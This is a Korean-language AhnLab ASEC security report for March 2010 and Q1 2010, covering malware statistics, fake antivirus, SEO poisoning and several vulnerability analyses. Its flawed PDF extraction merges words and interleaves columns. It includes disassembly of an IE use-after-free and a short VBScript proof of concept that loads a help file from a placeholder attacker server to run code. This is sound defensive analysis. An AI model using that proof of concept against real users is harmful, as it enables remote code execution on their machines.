Transcription

1

2

3 Ⅰ. 이달의보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top20 이다 년 3 월악성코드통계현황은다음과같다. [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-2] 악성코드대표진단명감염보고 Top 20 [ 표 1-1] 악성코드감염보고 Top 년 3월의악성코드감염보고는 TextImage/Autorun 이 1위를차지하고있으며, Win32 /Induc과 Win32/Parite가각각 2위와 3위를차지하였다. 신규로 Top20 에진입한악성코드는총 6건이다. 2010년 3월의감염보고건수는 Win-Trojan/Agent 가총 453,611건으로 Top20중 12.2% 의비율로 1위를차지하고있으며, Win-Trojan/Onlinegamehack이 375,499건으로 2위, Win-Trojan/Downloader 가 344,736 건으로 3위를차지하였다. 아래차트는고객으로부터감염이보고된악성코드유형별비율이다. [ 그림 1-1] 악성코드유형별감염보고비율 AhnLab Policy Center 4.0 세상에서가장안전한이름안철수연구소 01

4 2010 년 3 월의감염보고건수는악성코드유형별로감염보고건수비율은 트로잔 (TROJAN) 류가 45.6% 로가장많은비율을차지하고, 웜 (WORM) 이 14%, 바이러스 (VIRUS) 가 9% 의비율을각각차지하고있다. 아래표는 3 월에신규로접수된악성코드중고객으로부터감염이보고 된악성코드 Top20 이다. [ 그림 1-2] 악성코드유형별감염보고전월비교 악성코드유형별감염보고비율을전월과비교하면, 트로잔, 웜, 바이러스, 스크립트 (SCRIPT), 드롭퍼 (DROPPER), 애프케어 (APPCARE) 가전월에비해증가세를보이고있는반면애드웨어 (ADWARE), 다운로더 (DOWNLOADER), 스파이웨어 (SPYWARE) 는전월에비해감소한것을볼수있다. [ 표 1-3] 신종악성코드감염보고 Top 20 3월의신종악성코드감염보고의 Top 20은 Win-Trojan/Onlinegamehack O가 32,336건으로전체 10.6% 를차지하여 1위를차지하였으며, Dropper/Onlinegamehack 가 23,928건으로 2위를차지하였다. [ 그림 1-3] 악성코드월별감염보고건수 3 월의악성코드월별감염보고건수는 7,578,804 건으로 2 월의악성코드 월별감염보고건수 11,718,469 건에비해 4,139,665 건이감소하였다. [ 그림 1-4] 신종악성코드유형별분포 3 월의신종악성코드유형별분포는트로잔이 71% 로 1 위를차지하였다. 그뒤를이어애드웨어가 12%, 드롭퍼가 7% 를각각차지하였다. 악성코드이슈 AhnLab V3 MSS Daonol 과 Palevo 악성코드는 3 월에도여전히기승을부렸다. 해외에 서는 Palevo(Mariposa) 관련 Botnet 운영자들이검거된소식도들렸다. 02 ASEC Report _ Vol.03

5 Botnet과이를제어하는시스템의경우거액으로판매되는데이를구입하여운영한자들로보인다. 따라서앞으로도 Palevo 악성코드는여전히기승을부릴것으로보인다. 가짜백신을설치하는프로그램도여전히극성이었다. 이번에는온라인으로항공권구매관련위장메일을보내고첨부된파일을실행하도록유도하는형태가발견되었다. 또한, 윈도우환경설정을변경하는가짜백신이보고되었으며, 검색결과를악용하여악성코드를배포하는 SEO Poisoning Attack이보고되었다. 호스트파일변조 악성코드에의한호스트 (hosts) 파일에대한변조는어제, 오늘의일은 아니다. 대부분Blackhole 라우팅기법으로알려진안티바이러스및보안관련홈페이지나호스트에대한접근을차단시킨다. 이번에알려진 hosts 파일변조는시그니쳐진단을회피할목적으로생성된것으로보인다. [ 그림 1-5] 변조된 hosts 파일형태 [ 그림 1-6] 감염된드라이버파일의구조와실행후예정상드라이버파일은악성코드의마지막섹션에암호화되어저장된다. 악성코드가로드될때이부분을복호화하여정상드라이버파일을메모리에로드하면서동작한다. 이때정상드라이버와스팸메일을보내는다른모듈도함께동작하도록되어있다. 파일상으로는존재하지않고 Services.exe 에코드를삽입하여동작하도록한다. 악성코드가시스템드라이버파일을변조 ( 또는패치 ) 하는목적은진단 / 치료를어렵게하려는목적과일부안티바이러스제품이가지고있는행위기반진단을우회하려는것으로보인다. 또한최근악성코드진단에화두가되는클라우드진단의장점을역이용하려는것으로생각된다. 따라서이러한점을잘알고이에맞는대응력과기술력을갖는안티바이러스제품의선택도중요한소비자의선택이되었다. [ 그림 1-5] 처럼 hosts 파일시작은 0x0A 값으로채워진형태 ( 텍스트편집기에서는 null 보임 ) 이다. 이크기는일정하지않다. 그리고 garbage data 역시생성될때마다 random 하기때문에변조된 hosts 파일은시그니쳐진단으로는 1:1 진단밖에되지않는다. 변조된 hosts 파일을만들어내는악성코드는 IRCBot으로, 자신을유저모드 (user mode) 로은폐하여동작을한다. 그리고자신의중요한코드대부분은 Explorer.exe 와같은윈도우중요프로세스에인젝션한후동작을하는특징을갖는다. 시스템드라이버파일을감염시키는악성코드윈도우시스템드라이버파일을감염시키는악성코드가이번에는 cdrom.sys 파일을대상으로감염시키는것이보고되었다. 지금까지대상이되었던시스템드라이버파일은다음과같다. Ntfs.sys Ndis.sys Agp440.sys Cdrom.sys 이들은여러가지경로부터감염되는데최근에는가짜백신을통해서도감염될수있는것으로확인되었다. 작년부터주로보고된이러한형태는지금까지도비슷한모습을갖는데감염된파일의외형은다음과같다. USB 충전프로그램에포함된악성코드건전지와충전지로유명한업체의 USB 배터리충전기의충전상태를알려주는프로그램에서악성코드가발견되었다. 악성코드가해당프로그램에어떻게포함되었는지는알려지지않았지만, 해당악성코드에감염되면 7777/TCP 포트가오픈되고외부로부터파일검색및실행등의백도어명령을수행할수있는것으로알려져주의가요구된다. 해당악성코드는 V3 에서 Win-Trojan/Arurizer 로진단된다. PDF 취약점을이용한악의적인문서유포 PDF 파일내 TIF 파일파싱과정중에서발생하는취약점 (CVE ) 을악용한다수의악의적인 PDF 문서파일들이발견, 보고되었다. 해당취약점에대한보안패치는이미 2월16일발표되었지만, 사용자들을대상으로취약한 PDF 가다수유포된시점은거의한달정도의시간이소요되었다. 한달이라는시간이지났음에도해당취약점을이용한악의적인문서가다수배포되었다는것은대부분의사용자들은여전히취약한버전을사용하고PDF 보안문제에대하여잘알지못하고있는것으로추정된다. 세상에서가장안전한이름안철수연구소 03

6 인터넷익스플로러제로데이취약점보고이번달에는인터넷익스플로러제로데이취약점이발견, 보고되었다. 이것은 MS 인터넷익스플로러 iepeers.dll 코드실행취약점에기인한다. 취약점이알려진후해당취약점을악용한악의적인스크립트파일이큰폭으로증가하였다. 이는여전히취약점은악성코드유포에가장많이사용되는경로임을알수있었으며, 취약점과해당악성코드를막기위해지속적인보안패치및안티바이러스엔진업데이트가중요하다는것을다시금일깨워주는계기가되었다. 보안패치는물론안티바이러스의소중함을다시금알수있는계기가되었다. 윈도우환경설정을변경하는가짜백신감염되었을경우윈도우의환경설정을변경하는가짜백신이발견되었다. 일반적인가짜백신의경우자동실행을위해윈도우자동실행항목인 Run registry 항목에등록된다. 하지만최근발견된가짜백신의경우실행파일 (EXE 파일 ) 을실행했을경우자동으로가짜백신이실행되도록레지스트리키를변조한다. 따라서윈도우에서실행파일을실행할때마다가짜백신이자동으로실행되게된다. 이경우가짜백신만삭제하게되면윈도우상의모든실행파일이정상적으로실행되지않는심각한문제가발생한다. 즉, 정상적으로윈도우를사용할수없게된다. 만약윈도우상에프로그램을실행했을때에러메시지없이프로그램이실행되지않는다면윈도우실행파일관련레지스트리설정이위와같은방법으로변경되었을가능성이높다. 고있고, 앞으로도이러한배포방법은더욱더늘어날것으로예상되고있다. 우선 SEO란 Search Engine Optimization( 검색엔진최적화 ) 의약자로사용자들이검색사이트에서특정키워드를검색한결과의페이지를 2~3페이지정도만보기때문에자신의블로그나사이트를많이노출시키기위해각검색엔진의 SEO 알고리즘을알아내면자신의블로그나사이트를검색결과상위에노출되게할수가있다. 악성코드제작자는기존에는특정취약한사이트에악성코드를삽입시켜놓거나게시판이나자료실을통해일반프로그램으로가장하여배포되는경우가많았었는데, 악성코드를배포할사이트를 SEO 알고리즘을이용하여검색결과상위에노출시킴으로써사용자가검색결과를클릭하여악성코드유포사이트로연결되게하는방식으로바뀌게된것이다. 이러한방법은사회의주요이슈나뉴스를검색사이트의키워드검색을통해확인하고있는사람들의심리를이용한사회공학기법을이용한한공격방법이라고할수있다. 보다쉽게예를들면아래그림은얼마전아이티지진과관련하여검색사이트에서 Haiti earthquake donate 로검색한결과중악성코드유포사이트로연결되는검색결과를클릭하여악성코드유포사이트로연결된그림이다. 이럴경우다음과같은임시방편으로문제를해결할수있다. [ 시작 ] -> [ 실행 ] -> 열기 (O): 에 command 입력후 [ 확인 ] 버튼클릭 CD\Windows 입력후엔터 ( 여기서 Windows 는윈도우가설치된폴더이름 ) ren regedit.exe regedit.com 입력후엔터 regedit 입력후엔터로레지스트리편집기실행실행된레지스트리편집기에서 HKEY_CLASSES_ROOT\. exe 로이동 ( 기본값 ) 의데이터가 exefile 이아닐경우 exefile 로수정하고레지스트리편집기종료위방법은 exe 확장자가정상적으로실행되지않을경우 exe 실행파일을 com 실행파일로변경한후실행하고 exe 확장자쉘명령을본래값으로되돌리는방법이다. 따라서정상적으로프로그램실행이불가능한경우에만사용해야한다. SEO Poisoning Attack 인터넷이발달하고검색사이트들이발달하면서, 대부분의사람들은원하는정보들을검색사이트를통해얻어가고있다. 이러한환경에서악성코드유포지를검색사이트의상위에랭크시켜해당사이트를방문하는사용자로하여금악성코드를유포하는경우가최근매우빈번히발생하 [ 그림 1-7] 악성코드유포사이트로연결되는절차 1) 사용자가검색사이트에서 Haiti earthquake donate 를검색을한다. 2) 검색엔진을거쳐검색된결과들이검색결과페이지에출력된다. 3) 이결과들중악성코드유포지가상위검색결과에나타나며, 해당링크를사용자가클릭을하게되면악성코드를유포하는사이트로연결되게된다. 4) 이렇게악성코드유포사이트로연결된사용자에게악성코드를다운로드후실행을하도록유도한다. 5) 악성코드다운로드후실행할경우악성코드 ( 대부분의유포된악성코드는허위백신 ) 에감염되게된다. 04 ASEC Report _ Vol.03

7 이러한악성코드유포방법은이미몇년전부터나왔던방법으로새로운공격방법은아니지만, 마이클잭슨, 동계올림픽, 김연아, 타이거우즈 등최근들어발생하는주요사회적이슈마다악성코드유포지가검색결과사이트에랭크되어있어사용자들의많은주의가요구되고있다. 이번달발견된악성코드유포사이트로연결되는검색결과들의검색키워드는아래와같다. Taiwan Earthquake ( 관련정보참조링크 : 으로보고된 7건의취약점을가지고있기때문에주의가필요하다. 이러한 Office 취약점은대부분공격형태가피싱 (Phishing) 공격과사회공학적기법또는웹사이트를통해공격이이루어짐으로, 신뢰되지않은메일의첨부파일이나, 신뢰되지않은웹사이트접속에특히주의해야한다. 또한백신설치와보안업데이트를통해문제점을해결해야한다. 악성코드침해웹사이트현황 아카데미시상식 ( 관련정보참조링크 : 헐리우드배우 Corey Haim 장례식 & Pacquiao vs Clottey ( 관련정보참조링크 : Andre Pitre ( 관련정보참조링크 : Kim Yuna Youtube ( 관련참조링크 : 이러한 SEO Poisoning Attack을예방하기위해서는상기 ASEC 블로그링크내설명에나와있듯이사이트가드 (SiteGuard) 와같은웹브라우저보안제품을설치하여사전에예방하길바란다. 2. 시큐리티동향시큐리티통계 3 월마이크로소프트보안업데이트현황 [ 그림 1-9] 악성코드배포를위해침해된사이트 / 배포지수 [ 그림 1-9] 는월별악성코드침해사이트현황을나타낸그래프로, 침해사이트가증가함에따라유포사이트도꾸준하게증가해왔음을알수가있는데그원인을살펴보면침해사이트를통해서유포되었던악성코드는대부분 Win-Trojan/Daonol 의변종들이었고, 유포되기위해서사용되었던유포사이트가고정적인것아니라가변적이며변경주기가빠르다는데있다. 마이크로소프트사로부터발표된이번달보안업데이트는 2 건 ( 중요 ) 이다. [ 그림 1-10] 악성코드배포를위해사용된취약점 [ 그림 1-8] 공격대상기준별 MS 보안업데이트 [ 표 1-4] 2010 년 3 월주요 MS 보안업데이트 [ 그림 1-10] 은월별침해사고가발생한웹사이트들에서악성코드를유포하기위해서사용했던취약점들에대한통계로, 3월의경우 2월과비슷한수준의통계를보이고있으며기존의 Internet Explorer에존재하는취약성만을공격하는고전적인방법보다는사용자들에게많이사용되면서외부와통신하는응용프로그램에존재하는취약성을공격하는형태가증가함에따라사용자들이신경써야할범위가넓어지고있음을의미한다. 이번달에는지난달에발표된 13 건보다훨씬적은 2 건의패치가발표되 었다. 특히 MS 은 Microsoft Office Excel 에서발견되어비공개적 세상에서가장안전한이름안철수연구소 05

8 시큐리티이슈 Microsoft Internet Explorer iepeers.dll Use-after-free Vulnerability 이취약점은 Internet Explorer의 Web Folders와 printing에사용되는 iepeers.dll 모듈에서생기는취약점으로, iepeers.dll 내에존재하는속성을설정하는 setattribute() 함수를핸들링하는과정에서문제점이발생한다. 이취약점에서사용하는 DHTML의 userdata Behavior는쿠키보다큰저장소를가지고있으며, 이는쿠키와비슷하게클라이언트에데이터를저장할때사용된다. userdata Behavior의언어별 syntax는아래와같다. [XML] <Prefix: CustomTag ID=sID STYLE= behavior:url( #default#userdata ) /> [HTML] <ELEMENT STYLE= behavior:url( #default#userdata ) ID=sID> [Scripting] object.style.behavior = url( #default#userdata ) object.addbehavior ( #default#userdata ) [CSS] h3 { behavior: url(#default#userdata); } if ( v3 ) { VariantClear(&pvarg); return value; } jscript.dll [IDispatchExGetDispID].text:75BC3055 push [ebp+arg_10].text:75bc3058 mov eax, [ebp+arg_4].text:75bc305b push [ebp+arg_c].text:75bc305e mov ecx, [eax] ; 이미해제된오브젝트의포인터를재사용.text:75BC3060 push [ebp+arg_8].text:75bc3063 push eax.text:75bc3064 call dword ptr [ecx+1ch] ; 메모리참조에러. 공격코드는아래와같다. 이러한 userdata Behavior를핸들링하기위해서는 setattribute() 함수나 getattribute() 함수를사용하여데이터에접근할수있다. 이과정에서문제점이발생하며, 이취약점이일어나는원인은이미해제된오브젝트를참조하여발생한다. 이는 Internet Explorer 6, 7 버전에서문제점이발생하며 Internet Explorer 5, 8 버전은해당되지않는다. iepeers.dll [setattribute@cpersistuserdata] //VARAINT형을형변환.text: F push 409h ; lcid.text:422353a4 mov eax, esi.text:422353a6 push eax ; pvarsrc.text:422353a7 push eax ; pvargdest.text:422353a8 call ds: imp VariantChangeTypeEx@.text:422353AE mov edi, eax.text:422353b0 test edi, edi.text:422353b2 jnz short loc_ // 변수클리어....text: lea eax, [ebp+pvarg].text: push eax ; pvarg.text: call ds: imp VariantClear@4 ; VariantClear(x) C 언어로변환한문제코드 v3 = VariantChangeTypeEx(&data, &data, 0x409u, 0, 8u); [ 그림 1-11] 악성코드배포를위해사용된취약점위코드에서보는바와같이이미해제된오브젝트의포인터를재사용함으로서메모리참조오류가발생하게된다. 공격자는이를이용하여, 공격쉘코드를힙영역에배치시키고잘못참조된메모리가힙을참조하게함으로서외부사용자의컴퓨터를장악할수있다. 현재까지보안업데이트가나오지않은관계로신뢰되지않은사이트의방문은피하며, 백신을설치하여미리보안에신경써야한다. XE ( 구제로보드 XE) XSS 취약점 XE 최신버전 (Core ) 버전에서 XSS(Cross Site Scripting) 취약점이나우콤측에의해발견되었다. XSS란 Cross Site Scripting의약자 (CSS 라고도불리기도하나 Cascading Style Sheets와혼용되어일반적으로 06 ASEC Report _ Vol.03

9 XSS를많이사용한다.) 로 Web 보안취약점중하나이다. XE 최신버전 (Core ) 버전에서 XSS(Cross Site Scripting) 취약점이나우콤측에의해발견되었다. XSS란 Cross Site Scripting의약자 (CSS 라고도불리기도하나 Cascading Style Sheets와혼용되어일반적으로 XSS를많이사용한다.) 로 Web 보안취약점중하나이다. XE에서는기본적으로 XSS가일어나는걸방지하기위해사용자에게입력받는 html 코드중이벤트기반의모든속성과스크립트, iframe, script 등많은필터링함수를제공하고있다. 하지만이번취약점은 HTML5 버전에서제공하는이벤트속성을필터링하지않아발생한다. HTML5에추가된태그와이벤트속성등은아래의 url을통해확인할수있다. 첫번째는문제점을발생시키는 VBScript 중 MsgBox 함수는스크립트를통해사용자에게메시지를보여주는기능을담당한다. - MsgBox 함수 - MsgBox(prompt[,buttons][,title][,helpfile,context]) MsgBox에전달되는파라미터를통하여 VBScript를사용하면 Windows Help 파일을참조할수있다. 따라서, 공격자는다음과같이악의적인 help 파일을참조하도록 MsgBox를만들고, 사용자가 Keyboard Shortcut F1 버튼을클릭하도록유도한다. big = \\ 공격자서버 \ 공격자파일.hlp MsgBox please press F1 to save the world,, please save the world, big, 1 MsgBox press F1 to close this annoying popup,,, big, 1 MsgBox press F1 to close this annoying popup,,, big, 1 [ 그림 1-12] 테스트코드 사용자가 F1 키를클릭하게되면, 악의적으로조작된공격자의파일이 winhlp32.exe를통해서실행되면서임의의명령을수행할수있게된다. 악의적인공격파일의경로는로컬파일시스템, SMB 또는 WedDav 를사용할수있다. 해당취약점은 F1 키를누르는사용자행위가요구되고, SMB세션접근을위한 139/445 TCP Outbound 통신채널이요구되는등공격의성공을위해서는몇가지제약사항들이존재하기때문에 Medium( 중 ) 정도의위험성을가질것으로예상된다. 두번째로일어나는취약점은스택오버플로우취약점이다. 이스택오버플로우취약점은 winhlp32.exe의 Finitialize 함수내에서일어난다. [ 그림 1-13] 자바스크립트실행 [ 그림 1-14] winhlp32.exe. 의 Finitialize 함수 이렇듯 HTML5를지원하는브라우저에서는 HTML5를이용하여 XSS를할수가있다. XSS를이용하여, 공격자는사용자정보를가로채거나, 관리자권한을획득하여 XE가설치된서버의쉘을획득할수있다. XE를사용중인홈페이지는 XE에서배포하는업데이트를받아설치하는것이좋다. [ 그림 1-15] winhlp32.exe. 의 Finitialize 함수디버깅 VBScript 코드실행취약점 Microsoft 사의 VBScript에서 HLP파일관련코드실행취약점이발표되었다. 이취약점은두가지취약점을가지고있다. 명령실행 : VBScript MsgBox + F1 + 원격지.hlp 파일실행 스택오버플로우 : winhlp32.exe 긴입력파라미터를통한스택오버플로우 실제해당함수내의스택의크기는 0x34C = 844 바이트크기 ( sub esp, 34Ch ) 를갖는다. 또한, 실제데이터가복사되는로컬스택은 EBP 로부터 0x298 = 664 바이트떨어진지점부터복사되기때문에입력문자열의유효한크기는최대 664 바이트가될수있다. 따라서, 최대 664바이트를넘는경우, RET 주소를사용자입력값으로덮어쓸수있게된다. 세상에서가장안전한이름안철수연구소 07

10 이를이용하여공격자는힙스프레이기법을사용하여힙에쉘코드를뿌 리고리턴어드레스가쉘코드가존재하는힙을가리키게하여사용자컴 퓨터의권한을획득할수있다. 악성코드인 %SYSTEM%\kb6.dll 을로딩하는역할을하고끝나면정상 Imm32.dll 의기능을수행할수있도록제어권을넘겨준다. 3. 웹보안동향 웹보안통계 웹사이트보안요약 [ 그림 1-16] 버퍼오버플로우전 ( 좌 ) 과후 ( 우 ) 모습침해사이트 Case Study 일부고객들에게서한글입력이안된다는증상이접수되어원인을파악하는과정에서특정사이트에침해사고발생하여유포되는악성코드가정상 imm32.dll을패치하여발생한다는것을알게되었다. 그래서이번에는이부분에대해서자세히알아보고자한다. 악성코드발견건수는 202,910건이고, 악성코드유형은 1,046건이며, 악성코드가발견된도메인은 959건 [ 표 1-5] 웹사이트보안요약이며, 악성코드발견된 URL은 4,594 건이다. 2010년 3월은 2010년 2월보다악성코드발견건수, 악성코드가발견된도메인, 악성코드발견된 URL 은감소하였으나, 악성코드유형은증가하였다. 월별악성코드발견건수 [ 그림 1-17] 침해사이트를경유한악성코드유포단계 위과정에의해서 %USERPROFILE%\Application Data\a.exe가생성되고해당파일에의해서정상 %SYSTEM%\imm32.dll이패치된다. 정상 imm32.dll을패치하는과정은내부적으로여러단계를거치지만그에대한자세한기술적인설명은생략한다. [ 그림 1-19] 월별악성코드발견건수 2010 년 3 월악성코드발견건수는전달의 394,232 건에비해 51% 수준 인 202,910 건이다. 월별악성코드유형 [ 그림 1-18] 정상 imm32.dll 이패치되는과정 [ 그림 1-16] 에서보는것처럼 A.exe 에의해서패치된 Imm32.dll 이실 행되면끝에삽입된바이러스코드가먼저실행되면서온라인게임핵 [ 그림 1-20] 월별악성코드유형 08 ASEC Report _ Vol.03

11 2010 년 3 월악성코드유형은전달의 1,042 건과비슷한 1,046 건이다. 월별악성코드가발견된도메인 [ 그림 1-23] 월별유형별분포 [ 그림 1-21] 월별악성코드가발견된도메인 2010 년 3 월악성코드가발견된도메인은전달의 975 건에비해 98% 수 준인 959 건이다. 악성코드유형별배포수에서 TROJAN류가 65,073건전체의 32.1% 로 1위를차지하였으며, ADWARE류가 59,914건으로전체의 29.5% 로 2위를차지하였다. 악성코드배포 Top 10 월별악성코드가발견된 URL [ 표 1-7] 악성코드배포 Top 10 [ 그림 1-22] 월별악성코드가발견된 URL 2010 년 3 월악성코드가발견된 URL 은전달의 5,090 건에비해 90% 수 준인 4,594 건이다. 악성코드배포 Top 10 에서 Win-Adware/Shortcut.InlivePlayerActiveX.234 가지난달과같이 38,057 건으로 1 위를차지하였으며, Top 10 에 Wi32/Virut 등 5 건이새로등장하였다. 악성코드유형별배포수 웹보안이슈 Twitter 메시지를이용한악성코드유포 [ 표 1-6] 월별유형별배포수 최근 SNS의대표적인사이트로알려진 Twitter는접근의편의성과정보의실시간등과같은여러장점으로사용자에게많은사랑을받고있다. 아직해외의높은인기에비해국내는인지율이낮지만, 꾸준히그편리함을무기로사용자를늘리고있다. 하지만, 이러한인기의상승과함께해커들의 Twitter 사용자에대한악의적인공격이증가하고있는추세이다. 이번에는 Twitter의단축 URL을통한악성코드배포사례가있어서안내하고자한다. Twitter의단축URL이란, Twitter는 140자내로만내용을게시할수있기때문에, 만약 URL과같이문자수길이가너무많은길이를차지하게된다면메시지를작성하는데제한을받게된다. 이러한문제를방지하기위해단축 URL을만들어서사용하고있다. 하지만, 이단축 URL은원래 URL 모양을인지할수없어, 악의적인용도로많이사 세상에서가장안전한이름안철수연구소 09

12 용될수있다. 최근에 Twitter 메시지중에서자극적인내용과함께, 단축 URL을포함한메시지가올라왔으며, 이를클릭시에악성코드유포 URL로연결되는것을확인하였다. [ 그림 1-24] 단축 URL 을포함한 Twitter 메시지 [ 그림 1-27] 가짜백신 (FakeAV) 가실행되어허위진단결과를보여주는화면 결론적으로, 사용자는 Twitter의단축 URL 기능을악용한타인으로인해가짜백신 (FakeAV) 를설치하고, 유료결제유도에넘어갈경우, 금전적인피해를입을수있다. 이러한문제를조기에방지하기위해현재해당파일들은다음과같이 V3에서진단및치료가가능하다. [ 그림 1-25] 악성코드유포사이트로연결된화면단축 URL을클릭하여해당사이트로이동하게되면, ActiveX Object 에러가발생하였다는메시지경고창과함께동영상을보기위해 ActiveX 설치를유도한다. ActiveX 설치에동의시에다운로드창을띄워파일을다운로드하며, 다운로드한파일 (inst.exe) 은아래그림과같이우리에게친숙한아이콘파일을다운로드한다. 파일명 : inst.exe 진단명 : Win-Trojan/Fakeav AA 하지만, 해당파일들은변조되어여러사이트를통해추가전파될수있으므로, 이러한악의적인공격을차단하기위해서는악성코드유포사이트를차단하는 AhnLab의 SiteGuard와같은웹보안제품의사용을권한다. [ 그림 1-26] 다운로드된악성파일 다운로드한파일을실행하면 Security Tool 이라는가짜백신 (FakeAV) 이실행되며, 허위진단결과를사용자에게보여주고, 결제를유도한다. AhnLab V3 Internet Security ASEC Report _ Vol.03

13 II. 1 분기보안동향 1. 악성코드동향 악성코드통계 아래표는악성코드의주요동향을파악하기위하여, 악성코드별변종을 종합한악성코드대표진단명감염보고 Top20 이다 년 1 분기악성코드통계현황은다음과같다. [ 표 2-2] 악성코드대표진단명감염보고 1 분기 Top 20 [ 표 2-1] 악성코드감염보고 1 분기 Top 년 1분기악성코드감염보고는 Win32/Induc이 1위를차지하고있으며, TextImage/ Autorun과 Win32/Parite가각각 2위와 3위를차지하였다. 신규로 Top20 에진입한악성코드는총 6건이다. 2010년 1분기사용자피해를주도한악성코드들의대표진단명을보면 Win-Trojan/Agent 가총보고건수 1,878,292건으로전체의 13.7% 를차지하여 1위를차지하였다. 그뒤를 Win-Trojan/OnlineGameHack 이 1,515,397건으로 11.1%, Win-Trojan/Downloader이 1,274,80 8 건으로 9.3% 를차지하여 2위와 3위를차지하였다. 아래차트는 2010 년 1 분기동안고객으로부터감염이보고된악성코드 유형별비율이다. AhnLab V3Net for Windows Server 7.0 [ 그림 2-1] 악성코드유형별 1 분기감염보고비율 세상에서가장안전한이름안철수연구소 11

14 악성코드유형별로감염보고건수비율은트로잔 (TROJAN) 류가 41.9% 로가장많은비율을차지하고있으며, 다음으로애드웨어 (ADWARE) 가 13%, 웜 (WORM) 가 10.9% 의비율을각각차지하고있다. [ 그림 2-2] 악성코드월별감염보고건수 [ 그림 2-3] 신종악성코드분기유형별분포 2010년 1분기의악성코드월별감염보고건수는 31,486,648건으로 2009년 04분기의악성코드월별감염보고건수 33,851,133건에비해 2,364,485건이감소하였다. 아래표는 2010년 1분기에신규로접수된악성코드중고객으로부터감염이보고된악성코드 Top20 이다. 2010년 1분기의신종악성코드유형별분포는트로잔이 60% 로 1위를차지하였다. 그뒤를이어애드웨어가 20%, 웜이 5% 를각각차지하였다. 악성코드이슈 2010년 1분기에발생한주요악성코드이슈를보면, 2009년에많은피해를입혔던, 취약점을이용한악성코드가여전히발생하였으며, 이동식디스크나 MSN을통해전파되는팔레보 (Palevo) 웜이등이보고되었다. 또한금전적인목적을가진국산리워드프로그램과즐겨찾기, 바로가기생성애드웨어가증가하였다. 인터넷익스플로러제로데이취약점 (CVE ) 1분기에는중국에서제작된다수의생성기가나오면서그변형또한유입이예상되었다. 일반적으로취약점코드의구성은쉘코드가포함되어있는악의적인스크립트를실행후쉘코드에의한악의적인파일다운로드및실행이일반적인방법이다. 다른형태로는악성코드파일을다운로드하지않고문서파일의취약점을이용하여경우에는문서파일자체에악의적인파일을숨겨쉘코드실행 -> 악의적인파일드롭 -> 실행순으로동작되는것이일반적이다. Win32/Palevo.worm 변형의기승 [ 표 2-3] 신종악성코드감염보고 Top 년 1분기의신종악성코드감염보고의 Top 20은 Win-Adware/ PointKing 가 232,120건으로전체 14.9% 를차지하여 1위를차지하였으며, Win-Trojan/OnlineGame Hack C가 125,451건 2 위를차지하였다. 팔레보웜은 1월부터지속적으로피해를입히고있다. 대부분의증상은 Explorer.exe에자신의스레드를만들어동작하는데이때특정호스트로부터명령을받아악의적인기능을수행할수있다. 특히이웜은자신을전파시키기위해서이동식디스크나 MSN으로명령을받은후전파될수가있다. 그리고특정시스템을공격하도록 TCP/UDP Flooding 공격을수행할수도있는데이또한감염후 C&C로부터명령을받아야만동작하게되어있다. 스스로자신을업데이트하고전파력이강한점이이웜의변형을확산시키는데어느정도일조한것으로보인다. 12 ASEC Report _ Vol.03

15 국산리워드 (reward) 프로그램의확산 1분기에는국내에서제작된리워드프로그램에의한피해가증가하였다. 특히애드웨어포인트킹 (Win-Adware/PointKing ) 의경우 2010 년 1월신종악성코드감염건수가두번째로많은것으로보고되었다. 쇼핑몰구매금액중일부를되돌려주는리워드프로그램은일정금액이상적립되었을경우에만현금으로돌려받을수있어일반적인경우에는환급이거의불가능하다. 이런점을이용해수많은리워드프로그램이우후죽순처럼생겨나고있다. 하지만대부분웹하드다운로드프로그램이나무료게임서비스의번들로설치되어보안제품에서진단하지못하는경우가많다. 일부리워드프로그램은인터넷익스플로러등의웹브라우저에 BHO(Browser Helper Object) 로동작해서잦은오류를일으키거나키워드검색결과를변조하기도한다. 따라서웹하드나무료게임등을하기전에설치되는프로그램의목록을꼼꼼히살펴보고자신에게불필요한서비스는설치하지않는것이좋다. 2. 시큐리티동향시큐리티통계 2010년 1분기마이크로소프트보안업데이트현황 2010년 1분기마이크로소프트사에서발표된보안업데이트는총 17건으로분기별평균에해당하는수준이다. 1분기에도마찬가지로보안패치가발표되기전에공격코드가인터넷에공개되어공격에활용되었다. 즐겨찾기, 바로가기생성애드웨어의증가 1분기에는인터넷즐겨찾기와인터넷바로가기를생성하는애드웨어가다시증가하였다. 과거엔 ActiveX를이용해설치되는경우가많았지만최근에는주로애드웨어의번들로설치되고있다. 이러한애드웨어는방문객을유치했을경우발생하는수익에대해일정금액을방문객유치자에게돌려주는일종의리베이트로수익을가져갈수있다. 따라서사용자의편리함을위해사용되어야할인터넷즐겨찾기와바로가기를돈벌이를위해악용하는사례는앞으로도증가할것으로예상된다. 악성코드침해웹사이트현황 [ 그림 2-5] 2010 년 1 분기보안업데이트현황 [ 그림 2-6] 악성코드배포를위해침해된사이트 / 배포지수 [ 그림 2-4] 애드웨어에의해생성된즐겨찾기들 [ 그림 2-6] 은분기별악성코드유포사이트현황을나타낸그래프로, 올 해 1 분기는작년 1 분기에비해월등히많은사이트들에침해사고가발 생해서악성코드가유포되었음을알수가있다. 올해 1 분기침해사고사이트를통해서유포되었던악성코드를살펴보 면 Daonol 이가장많았고 OnlineGameHack, AutoRun, Virus 등이그뒤 를따랐다. 세상에서가장안전한이름안철수연구소 13

16 Internet Explorer Information Disclosure 취약점 [ 그림 2-7] 악성코드배포를위해사용된취약점 Black Hat DC 2010에서 Microsoft Internet Explorer에서 Security Zone 을우회할수있는취약점에대한발표가있었다. 해당취약점은오래전부터존재하고있었던것으로써발표당시, Internet Explorer 7,8의 Protedted Mode가설정되어있는경우를제외한모든버전에해당되는문제였다. 공격자는해당취약점을이용하여웹페이지접근을통해사용자의로컬컴퓨터상에존재하는파일들의정보를획득하거나스크립트실행을통해임의의명령을수행할수있다. 일반적인악성코드가웹페이지에삽입되는것과는달리 cookie, url 접근 history 파일및다양한경로를통해악성코드가실행될수있기때문에해당취약점을이용하는실제공격이발생한다면일반적인방식으로탐지하기가어려울수있다. [ 그림 2-7] 은분기별침해사고가발생한웹사이트들에서악성코드를유포하기위해서사용했던취약점들에대한그래프로, 개별취약점별로살펴보면올해 1분기는 PDF 취약점을이용한악성코드가많았지만전체취약점통계를보면 Internet Explorer의취약점을이용한악성코드가많음을알수가있다. 시큐리티이슈 MS Internet Explorer DOM(Document Object Model) Memory Corruption 제로데이취약점등장 2010년 1월초부터발생한제로데이공격으로인하여악성코드유포가많이발생을하였는데, 해당제로데이공격은 Internet Explorer 